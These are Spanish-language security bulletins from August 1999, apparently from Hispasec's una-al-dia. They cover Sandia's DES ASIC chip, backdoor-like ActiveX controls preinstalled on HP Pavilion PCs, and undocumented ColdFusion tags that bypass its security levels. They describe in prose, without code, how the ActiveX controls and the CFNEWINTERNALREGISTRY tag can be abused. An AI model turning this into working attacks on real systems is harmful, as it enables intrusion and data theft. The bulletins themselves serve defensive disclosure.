El corazón de ésta máquina está basado en un nuevo chip resultado
del trabajo en Sandia, el "SNL Data Encryption Standard (DES) Application
Specific Integrated Circuit (ASIC)." A día de hoy, es la implementación
más rápida conocida del algoritmo DES.

El dispositivo consiste en 16 conjuntos de 16.000 transistores integrados
en un chip del tamaño de una moneda. La información es procesada en
unidades de 64-bits que son canalizadas a través de los transistores,
donde un algoritmo de cómputo intenso transforma la información de modo
que llegue a ser incomprensible a cualquier persona que no tenga la clave
de cifrado.

Las primeras pruebas efectuadas con el DES ASIC arrojaron una media
de 6,7 mil millones de bits por segundo, aunque en teoría el dispositivo
podrá llegar a funcionar a una velocidad que ronda los 9,28 billones de
bits por segundo.

Estás cifras han hecho pensar a muchos en la posible utilidad del
DES ASIC como crackeador por parte del gobierno de los EE.UU., aunque
en estos momentos desde Sandia no se han facilitado datos que puedan
permitirnos valorar cual es su potencia en esta faceta.

Según Jesús Cea Avión, experto en seguridad, "la capacidad de cifrado
no implica que llegue a conseguir esas velocidades en todo tipo de
situaciones. En el caso de que cada bloque tenga una clave distinta
el sistema vería su potencia mermada debido al coste del «key setup»".

Las sospechas tienen su base en que Sandia es un laboratorio de Seguridad
Nacional, perteneciente al Departamento de Energía de los EE.UU., y
que en el pasado jugó un importante papel durante los años de la guerra
fría. Entre algunos de sus logros en el pasado, nos podemos encontrar el
proyecto Manhattan, donde se desarrolló la bomba atómica de la Segunda
Guerra Mundial.

En estos momentos la misión de Sandia pasa por "trabajar conjuntamente
con las universidades y la industria para realzar la seguridad, la
prosperidad, y el bienestar de la nación". Aunque ésta declaración
trae consigo el que aporte soluciones científicas para "resolver
necesidades en el desarrollo de armas nucleares y sistemas relacionados
de la defensa, seguridad de la energía, e integridad ambiental, así
como para contrarrestar cualquier desafío nacional que pueda emerger
en contra del gobierno y la industria".


En esta ocasión insisten en que el DES ASIC es un dispositivo que
va a permitir potenciar el comercio electrónico en Internet, al igual
que otros sistemas que tengan que satisfacer requisitos de cifrado a
alta velocidad.

Más información:
DES ASIC en Sandia: http://www.sandia.gov/media/NewsRel/NR1999/encrypt.htm


Bernardo Quintero



lunes, 2 de agosto de 1999

Agujeros en Windows 98 a través de controles Active-X

En esta ocasión las puertas traseras se encuentran en los nuevos
modelos HP Pavilion que incluyen Windows 98. Se ha detectado que
en la configuración por defecto se instalan dos controles Active-X,
extremadamente peligrosos, que permiten acceder y ejecutar programas
en los ordenadores de los clientes a través de páginas web o correo HTML.
De manera similar a como ocurría con los Compaq Presario, (ver una-al-dia
del 31-7-1999), los controles Active-X, desarrollados por SystemSoft, se
incluyen en los sistemas HP como parte de un paquete de diagnóstico del
sistema denominado SystemWizard. En teoría, ambos controles sólo deberían
utilizarse para los diagnósticos del sistema, pero se ha demostrado
que con unas sencillas líneas en javascript se pueden lograr fines
totalmente diferentes:



-Pueden instalar un troyano o infectar el sistema con un virus de forma
automática y sin conocimiento por parte del usuario.

-Desactivar todas las protecciones de seguridad del sistema, lo que
facilita ataque posteriores.

-Leer cualquier fichero del sistema y enviarlo a un sitio remoto de forma
transparente al usuario.

-Borrar ficheros y documentos, incluso formatear el disco duro.

Los controles pueden ser utilizados desde una página Web o correo en HTML,
y para llamarlos basta con incluir una etiqueta <OBJECT> con los parámetros
adecuados dentro del código HTML. Sin duda, es difícil dar más facilidades
que puedan permitir el control de un sistema de forma remota y a la vez
tan sencilla. El control Launch permite, por ejemplo a través de JavaScript,
ejecutar comandos DOS y programas Windows, e incluye la posibilidad de
pasarles parámetros. Mediante el otro control en discordia, RegObj, se
consigue leer, buscar y configurar las claves del registro de Windows.

Todo parece indicar que estos casos son solo la punta del iceberg, y que
en realidad la mayoría de los sistemas preinstalados, por una u otra causa,
incluyen controles Active-X o applets Java peligrosos para la integridad
de sus sistemas. Uno de los últimos casos más sonados vino de la mano
de Microsoft, que en la instalación del Internet Explorer 5 incluía el
control DHTML Edit, Active-X con el que se podían acceder de forma remota
a nuestros ficheros. Desgraciadamente, a día de hoy, son muchos los
usuarios que aun mantienen el control en sus sistemas sin la pertinente
actualización a la última versión del navegador que corrige el problema.

Active-X, y algunos applets, basan su seguridad en los certificados de
autentificación (Authenticode de Microsoft) a través de los cuales los
usuarios deciden si son confiables y, por tanto, los ejecutan en su
ordenador. Hasta aquí resultaba una forma efectiva de dejar toda la
responsabilidad en manos el usuario, ya que decidía en última instancia
si lo ejecutaba o no.

El problema es que los fabricantes, en los sistemas preinstalados, y sin
dar pie a que el usuario decida, hacen confiables de antemano ciertos
controles porque lo utilizan como parte de sus soluciones. Para colmo
de males, resulta que son esos controles, que el usuario no ha hecho
confiables, los que pueden causar daños irreparables.

Más información:
Puertas traseras en Compaq Presario: http://www.hispasec.com/unaaldia.asp?id=278
Active-X en Windows98: http://www.tiac.net/users/smiths/acctroj/index.htm
Bug en DHTML Edit Active-X: http://www.microsoft.com/security/bulletins/ms99-011.asp
Parches para los controles de SystemSoft: http://www.systemsoft.com/support/syswiz/index.htm



Bernardo Quintero



domingo, 1 de agosto de 1999

Etiquetas no documentadas de ColdFusion pueden causar problemas

ColdFusion es un popular software de servidor de aplicaciones web,
ampliamente usado en entornos corporativos e intranets por sus
posibilidades de programación. Pero se ha descubierto un conjunto
de etiquetas no documentadas que podrían causar problemas en servidores
que alojen páginas programadas por terceros.
El servidor de ColdFusión incluye un gran número de funciones y etiquetas
CFML no documentadas que se usan en el Administrador de ColdFusion. El
Administrador de ColdFusion es una aplicación web empleada para establecer
diversas opciones del servidor. En dicho entorno, el acceso a estas
funcionalidades no documentadas está restringido a las personas con
privilegios administrativos, sin embargo, las funciones y tags se pueden
usar dentro de cualquier documento independientemente de su situación.

Como resultado de esto, los desarrolladores con permisos para crear
aplicaciones web y plantillas ejecutables sobre un ColdFusion Server
pueden hacer uso de estas funciones y etiquetas no documentadas para
conseguir acceso no autorizado a configuraciones administrativas. En
lo que se incluye el registro del sistema, bases de datos y
configuraciones avanzadas de seguridad.

En la mayoría de los casos, esto no representa ningún peligro para la
seguridad ya que son los propios desarrolladores de confianza quienes
tienen acceso al servidor. Sin embargo, en un entorno de aplicaciones
hospedadas, como un ISP o un centro corporativo que de hospedaje a
múltiples aplicaciones desarrolladas por programadores independientes
sobre un único servidor, las etiquetas no documentadas pueden
representar un riesgo de acciones maliciosas por parte de aquellos
desarrolladores que hospeden aplicaciones en el servidor. Por ejemplo,
mediante la etiqueta CFNEWINTERNALREGISTRY un programador puede tener
control total sobre el registro del sistema.

Las etiquetas no documentadas pueden saltarse los dos niveles de
seguridad de ColdFusión, básico y avanzado. En la actualidad no se
pueden deshabilitar funciones de ColdFusión. En general, crear una
aplicación hospedada segura requiere el uso de numerosas capas de
seguridad como red, firewall, sistema operativo, servidor ColdFusion,
servidor web y seguridad en el servidor de bases de datos. Allaire
recomienda a los administradores del servidor restringir el acceso
a los desarrolladores de confianza y las aplicaciones testadas para
así prevenir la instalación de código malicioso.

Más información:
Allaire: http://www.allaire.com/handlers/index.cfm?ID=11714&Method=Full
Bugtraq: http://www.securityfocus.com/vdb/bottom.html?vid=550


Antonio Ropero